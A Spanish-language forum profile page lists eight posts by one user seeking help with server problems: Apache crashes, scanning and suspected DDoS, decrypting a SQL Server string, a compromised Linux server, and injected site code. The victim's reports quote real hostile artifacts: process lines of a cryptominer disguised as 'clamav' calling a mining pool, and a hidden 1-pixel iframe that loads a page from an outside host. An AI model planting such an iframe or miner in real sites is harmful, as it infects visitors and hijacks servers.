Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Cronck

#1
Ingeniería Inversa / descifrar cadena de sqlserver
21 Noviembre 2014, 17:55 PM
alguien sabe el metodo que se uso para cifrar esta cadena?

0x00C82BEFF2985045B590B98BC13CC4D101000000A5E8698E02898D091DCE6AC7BA59C4BD81E021360DAE501E5F5380206F685118D8307693D3E6D6B76D3A035E265E65E717CC4E518224D73F8751D88EDC123C8E

provienen de una base en SQL SERVER

Les agradezco un tip para poder desencriptarla  ;D :D

saludos
#2
Buenos dias a todos..

Les cuento...

Hace unos dias tuve un problema con el servicio apache, de mi servidor, repentinamente dejo de contestar solicitudes y el sitio arroja error 503.

Tuve que reinicar el servicio httpd para que pudiera operar nuevamente.

Revisando entre los logs solo encontre algunas cosas que daban referencia a que el fastcgi estaba operando mal.

Citar[Tue Jul 15 18:26:49 2014] [notice] caught SIGTERM, shutting down
[Tue Jul 15 18:26:57 2014] [error] FastCGI process 7154 still did not exit, terminating forcefully
[Tue Jul 15 18:26:57 2014] [error] FastCGI process 7151 still did not exit, terminating forcefully
[Tue Jul 15 18:26:59 2014] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec)
[Tue Jul 15 18:27:00 2014] [warn] RSA server certificate CommonName (CN) `Parallels Panel' does NOT match server name!?

investigando encontré que es un problema del tiempo de sesión que maneja el fastcgi, por lo que aumente el timeout de 40 a 90

También aumente los valores del nginx en el parametro fastcgi_buffer de 32 a 256

No se ha presentado nuevamente el problema.

Pero ya entrando al tema como tal, para monitorear el comportamiento de apache, active el server-status y encontre algunas cosas que son las que quiero consultar con ustedes.

He estado viendo que si renicio el servicio los procesos operan normalmente, pero despues de un tiempo hay procesos que se quedan pegados por mucho tiempo

desconozco que es lo que esten haciendo o por que apache los retiene.  :¬¬
Tambien desconozco si sea por los cambios que hecho en el fastcgi.

Básicamente requiero saber por que se quedan pegados, que procesos son y saber si esto nos esta ocacionando el error de que deje de operar el apache  :-[

Los procesos que se quedan pegados son los que estan dentro del cuadro rojo



De antemano muchas gracias por el apoyo

#3
Buenas tardes a todos.

Este Post es sumante de caracter de aprendizaje.

Tengo un servidor el cual tiene mucha actividad diariamente, y de igualmente tengo mucho intentos de acceso por ftp, ssh, y posxfix, esto me lo detecta el Fail2ban y me bannea las IP

Tambien tengo muchos escaneos diariamente, en busca de de información en mi sitio...buscando si tengo un CMS.

Creo que he aplicado muchas medidas y me han funcionado, pero aun no logro hacer que apache no se caiga...como en este ejemplo.

http://75.126.190.221/24feb2014exp.mp4

En el video muestro el alto volumen que tengo de trafico en mi sitio, pero lo interesante es en el minuto 4:38 del video, donde muestra que el apache ya esta funcionando mal y no contesta las peticiones que le estan haciendo.

Y al abrir el sitio marca error 502.

Y en los graficos de comportamiento de mi servicio apache, muestra el incremento de actividad, como lo muestra en esta imagen.


La primera pregunta es:

1.- Que método es el que usan para hacer un ataque como ese a mi sitio, el bloqueo del apache se da por el alto volumen de trafico.

2.- Como puedo modificar apache para prevenir estas caída, ya revise los post de como detener los DDoS, y he aplicado las medidas que indican, pero aun así sigo con problemas.

Como lo indique ya he estado investigando y he encontrado información muy valiosa, pero a su ves he encontrario que otros opinan lo contrario a esa medida.

Es por ello que abro este post, con la idea de entender el comportamiento de mi apache y como ir ajustando las tuercas para llegar a lo optimo.

Les agradeceria si con las ideas de los que gusten opinar al respecto, ir creando un documento informativo que les pueda servir a otros usuarios.
#4
Buenos dias, ando buscando poder realizar una auditoria de codigo, y tambien aplicaciones de prevencion.

y solo he encontrado este sitio.

www.stopthehacker.com

Al quien conoce un sitio similiar o algo que me recomienden para poder tener mis sitios al tiro?

Saludos
#5
Seguridad / Evitar Escaneo continuo puerto 80
21 Enero 2014, 17:50 PM
Hola a todos.

En estos ultimos 3 dias, he detectado un escaneo (o  no se que nombre darle) a mi servidor, por el puerto 80.
Me estan llegando peticiones de rutas que no estan en mi servidor, y que nunca han estado.

Como estas:

Citar122.10.91.225 - - [19/Jan/2014:03:55:26 -0600] "GET /Article/ HTTP/1.0" 404 278 "-" "Mozilla/4.0 (compatible; MSIE 7.0; windows 5.1)"
66.249.73.229 - - [19/Jan/2014:03:55:26 -0600] "GET /Article/Print.asp?ArticleID=158029&Page=1 HTTP/1.1" 404 287 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
42.121.194.212 - - [19/Jan/2014:03:55:29 -0600] "GET /Article/world/ouzhou/Index.html HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
58.18.141.131 - - [19/Jan/2014:03:55:30 -0600] "GET /Article/ShowElite.asp HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
66.249.73.229 - - [19/Jan/2014:03:55:32 -0600] "GET /Article/china/201009/20100904235145.html HTTP/1.1" 404 310 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
66.249.73.229 - - [19/Jan/2014:03:55:37 -0600] "GET /Article/UploadFiles/200807/20080716151018416.jpg HTTP/1.1" 404 318 "-" "Googlebot-Image/1.0"
173.254.201.109 - - [19/Jan/2014:03:55:43 -0600] "GET /Article/china/Index.html HTTP/1.1" 404 294 "-" "Apache-HttpClient/4.1.1 (java 1.5)"
106.49.97.244 - - [19/Jan/2014:03:55:46 -0600] "GET /Article/junshi/Index.html HTTP/1.0" 404 295 "-" "Mozilla/5.0 (Windows NT 5.2; rv:14.0) Gecko/20100101 Firefox/14.0.1"
113.108.220.45 - - [19/Jan/2014:03:55:47 -0600] "GET / HTTP/1.1" 302 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
58.64.153.141 - - [19/Jan/2014:03:55:51 -0600] "GET / HTTP/1.1" 302 - "-" "-"
218.24.109.120 - - [19/Jan/2014:03:55:52 -0600] "GET /Article/gd/201205/20120507045218_3.html HTTP/1.1" 404 309 "-" "-"
204.12.252.34 - - [19/Jan/2014:03:55:53 -0600] "GET /Article/money/jinrong/Index.html HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
204.12.252.34 - - [19/Jan/2014:03:55:54 -0600] "GET /Article/world/dongnanya/Index.html HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
124.165.209.163 - - [19/Jan/2014:03:55:54 -0600] "GET /Article/ShowElite.asp HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
204.12.252.34 - - [19/Jan/2014:03:55:54 -0600] "GET /Article/taiwan/minjindang/Index.html HTTP/1.1" 404 306 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
204.12.252.34 - - [19/Jan/2014:03:55:55 -0600] "GET /Article/taiwan/Index.html HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"

No se como detener esas peticiones, pues vienen de direntes IP's

Llevan haciendolo por 3 dias y practicamente es 24 horas que tienen levantado ese escaneo.

Alguien que me un indicio para evitar esto?

Saludos a todos
#6
Seguridad / Servidor Linux comprometido
3 Septiembre 2013, 18:52 PM
Buenas tardes a todo, el tema es...tengo un servidor web en donde tengo algunos sitios, pero ultimamente he tenido problemas con el.

Me han ingresado codigo en los index

Ve procesos corriendo como estos:
ps aux | grep clamav
apache     623 46.1  0.0  54784  1592 ?        Ssl  11:11   6:05 ./clamav -a scrypt -o http://pool-nvc.khore.org:9332 -O u8080.1:1 -B
apache     635 46.1  0.0  55808  1592 ?        Ssl  11:11   6:04 ./clamav -a scrypt -o http://pool-nvc.khore.org:9332 -O u8080.1:1 -B
apache     647 46.1  0.0  55808  1596 ?        Ssl  11:11   6:04 ./clamav -a scrypt -o http://pool-nvc.khore.org:9332 -O u8080.1:1 -B
apache     659 46.1  0.0  55808  1596 ?        Ssl  11:11   6:04 ./clamav -a scrypt -o http://pool-nvc.khore.org:9332 -O u8080.1:1 -B
root      1001  0.0  0.0   4016   668 pts/0    S+   11:24   0:00 grep clamav


Veo que en TMP hay varios archivos ocultos:
drwxr-xr-x  2 root  root     4096 Nov  6  2012 .autoinstaller
-rw-------  1 root  root    10518 Sep  2 16:17 .bash_history
-rw-r--r--  1 root  root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root  root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root  root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root  root        0 Sep  3 11:45 cron.php
-rw-r--r--  1 root  root      100 Jan  6  2007 .cshrc
drwx------  3 root  root     4096 Dec 29  2010 .gconf
drwx------  2 root  root     4096 Dec 29  2010 .gconfd
drwx------  2 root  root     4096 Sep  2 10:05 .gnupg
-rw-r--r--  1 root  root     1320 Dec  4  2002 jcameron-key.asc
-rw-------  1 root  root       73 Nov 26  2012 .lesshst
-rw-r--r--  1 root  root  2952318 Jul 23  2010 LINUX_32.tar.gz
-rw-------  1 root  root      168 Nov  5  2012 .mysql_history
-rw-------  1 root  root     1024 Jul 12  2012 .rnd
drwxr-xr-x  3 root  root     4096 Dec 29  2010 .sl-orig-configs
drwx------  2 root  root     4096 Jul 13  2012 .spamassassin
-rw-r--r--  1 root  root      129 Jan  6  2007 .tcshrc


Ya ejecute las aplicaciones para encontrar algun rootkit como son rkhunter y chkrootkit.

Pero no logro encontrar como se están infiltrando y sobre todo como elimininar esa infeccion.

Si alguien tiene alguna idea de como iniciar la busquera o algunas medidas que tenga que tomar para poder eliminar este mal de mi servidor..

Ya no se por donde investigar..se que me falta mucho por revisar pero no se por donde...

Saludos
#7
Seguridad / Ataque Servidore windows R2 2008
18 Mayo 2013, 01:28 AM
Buenas tardes a todos, nuevamente me da gusto regresar a este foro.

En esta ocacion para consultar con ustedes un problema que he tenido en unos servidores, hace unos día tube un ataque a unos sitios que tengo en estos servidores, todos los nombres de los archivos están iguales, pero el contenido era distinto.

Dentro de ello habian 2 lineas similares a estas:

<iframe width="1px" height="1px" src="http://ishigo.sytes.ne
t/openstat/appropriate/promise-ourselves.php" style="display
:block;" >


Restaure toda la informacion y 2 dias despues google me bloqueo el sitio por tener contenido malicioso, al revisar el index, footer y header del sitio en las ultimas lineas contenía el código anterior.

Actualmente estoy cambiando los sitios a otros servidores, para desechar estos con lo que tengo problemas.

Pero me surgen las siguientes dudas.

1.- Que tipo de ataque a sido este?
2.- Como saber si realmente la información esta limpia al pasarla al otro servidor y poder salir de la lista negra de google
3.- Como prevenir estos acontecimientos.

Realmente me sentí muy vulnerable, yo he usado linux mas de 10 años hacia atrás, y es mi primera ves que uso windows por requerimiento de estos sitios y no pude encontrar la solución del error.

Saludos y gracias por sus comentarios
#8
GNU/Linux / Auditoria en servidor linux
29 Agosto 2012, 16:22 PM
Buenos dias, me gustaria leer sus opiniiones sobre el siguiente tema.

Necesito realizar un inventario de uno de los servidores que tengo, pues en días anteriores alguien me ha eliminado un Shell que había creado pero no logro encontrar que usuario fue.

En teoria la unica persona que puede acceder por ssh soy yo, pero hay varios que acceden por ftp, y otros se conecta a las bases de datos.

Si tienen alguna idea de como rastrear esos moviemiento se los agradecere.

Saludos